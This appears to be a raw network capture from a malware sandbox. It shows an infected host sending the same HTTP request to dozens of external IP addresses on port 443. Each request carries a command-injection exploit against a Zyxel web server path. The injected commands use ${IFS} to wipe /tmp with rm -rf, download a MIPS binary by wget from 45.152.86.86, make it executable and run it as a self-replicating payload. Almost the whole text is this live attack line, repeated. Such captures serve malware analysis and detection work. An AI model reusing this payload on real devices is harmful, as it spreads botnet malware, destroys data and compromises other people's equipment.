                                        Mar 31, 2024 09:20:43.382236004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1838192.168.2.2353130163.163.132.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382262945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1839192.168.2.2356886112.98.181.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382309914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1840192.168.2.235580219.67.149.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382369995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1841192.168.2.233816280.198.73.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382419109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1842192.168.2.2359254218.206.96.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382474899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1843192.168.2.2359626195.180.206.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382508039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1844192.168.2.2336686135.231.201.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382561922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1845192.168.2.233950079.53.148.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382591009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1846192.168.2.234011681.110.125.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382666111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1847192.168.2.2342448116.205.9.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382704020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1848192.168.2.2339312132.73.46.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382749081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1849192.168.2.235438236.104.98.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382793903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1850192.168.2.236078472.219.90.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382839918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1851192.168.2.235496260.189.128.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382875919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1852192.168.2.2336268131.50.8.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382917881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1853192.168.2.2335444210.222.126.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382988930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1854192.168.2.23423449.35.101.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383029938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1855192.168.2.2359740220.149.19.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383085012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1856192.168.2.2359366159.56.128.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383117914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1857192.168.2.2357890128.224.84.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383172035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1858192.168.2.234312419.203.210.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383203030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1859192.168.2.2355104172.227.147.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383249044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1860192.168.2.2348166103.239.92.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383287907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1861192.168.2.2350412168.191.86.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383317947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1862192.168.2.2339806192.13.112.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383367062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1863192.168.2.2335726216.180.0.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383409977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1864192.168.2.234459444.234.5.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383452892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1865192.168.2.23332869.41.52.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383503914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1866192.168.2.235775619.32.133.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383548975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1867192.168.2.2356842196.131.162.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383609056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1868192.168.2.23330428.42.11.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383641958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1869192.168.2.2352398148.102.130.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383698940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1870192.168.2.2344702111.205.254.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383749008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1871192.168.2.2355618209.31.248.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383796930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1872192.168.2.2360284199.99.42.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383824110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1873192.168.2.2352354102.223.14.65443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383862972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1874192.168.2.2356946192.107.130.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383919001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1875192.168.2.235328041.171.57.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.383955002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1876192.168.2.233732691.63.248.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384001017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1877192.168.2.233913499.192.144.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384042978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1878192.168.2.233881662.129.0.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384092093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1879192.168.2.2338002176.20.245.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384139061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1880192.168.2.2349266114.193.33.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384179115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1881192.168.2.2358632154.209.188.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384238005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1882192.168.2.2344400135.197.172.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384273052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1883192.168.2.2333114146.132.231.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384320021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1884192.168.2.2336160174.11.57.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384377003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1885192.168.2.234343875.17.223.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384402037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1886192.168.2.233643492.231.18.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384454966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1887192.168.2.233379249.4.100.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384500027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1888192.168.2.233639869.153.231.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384552956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1889192.168.2.234039278.136.151.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384598017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1890192.168.2.2339514109.20.38.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384638071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1891192.168.2.2353040173.30.158.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384670973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1892192.168.2.233696477.74.46.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384711981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1893192.168.2.2346994120.168.239.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384747982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1894192.168.2.235911048.138.90.248443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384794950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1895192.168.2.236076224.17.185.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384845018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1896192.168.2.2337654101.122.125.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384886980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1897192.168.2.23363545.140.159.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384916067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1898192.168.2.2347976128.15.231.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.384980917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1899192.168.2.23345982.143.61.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385020018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1900192.168.2.2357672221.63.138.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385087013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1901192.168.2.2335708113.147.220.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385118008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1902192.168.2.2337100191.161.247.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385160923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1903192.168.2.2349714221.252.42.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385216951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1904192.168.2.235480257.189.242.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.385251045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1905192.168.2.2347500111.193.78.232443
                                        TimestampBytes transferredDirectionData
